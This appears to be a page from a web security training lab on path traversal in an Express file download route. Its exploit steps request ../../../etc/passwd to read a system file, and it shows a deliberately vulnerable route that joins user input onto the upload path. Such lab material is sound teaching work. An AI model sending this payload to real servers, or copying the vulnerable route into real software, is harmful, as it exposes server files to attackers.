
Path Traversal in File Download

Easy
#path-traversal
#owasp-a01
#file-access

Overview

This lab demonstrates how unsanitized file path parameters can allow attackers to read arbitrary files from the server filesystem.

Scenario

The application provides a file download feature at `/api/download?file=report.pdf`. The `file` parameter is joined directly onto the upload directory path without any validation.

Exploit Steps

  1. Request a legitimate file: GET /api/download?file=report.pdf
  2. Modify the file parameter: GET /api/download?file=../../../etc/passwd
  3. Observe that the server returns the contents of /etc/passwd

routes/download.js

```javascript
// Vulnerable — unsanitized file path
// `express` and `path` are the modules this route relies on; `authenticate`
// is the application's own auth middleware, defined elsewhere in the lab.
const express = require('express');
const path = require('path');
const app = express();

app.get('/api/download', authenticate, (req, res) => {
  const filename = req.query.file;

  // ❌ Direct concatenation allows traversal: path.join normalizes the
  // "../" segments away, so "../../../etc/passwd" becomes /etc/passwd,
  // which is outside /app/uploads/ but is served anyway.
  const filepath = path.join('/app/uploads/', filename);
  res.sendFile(filepath);
});
```

This code contains a known vulnerability. Never deploy code like this in production. Use the Secure Mode toggle to see the remediation.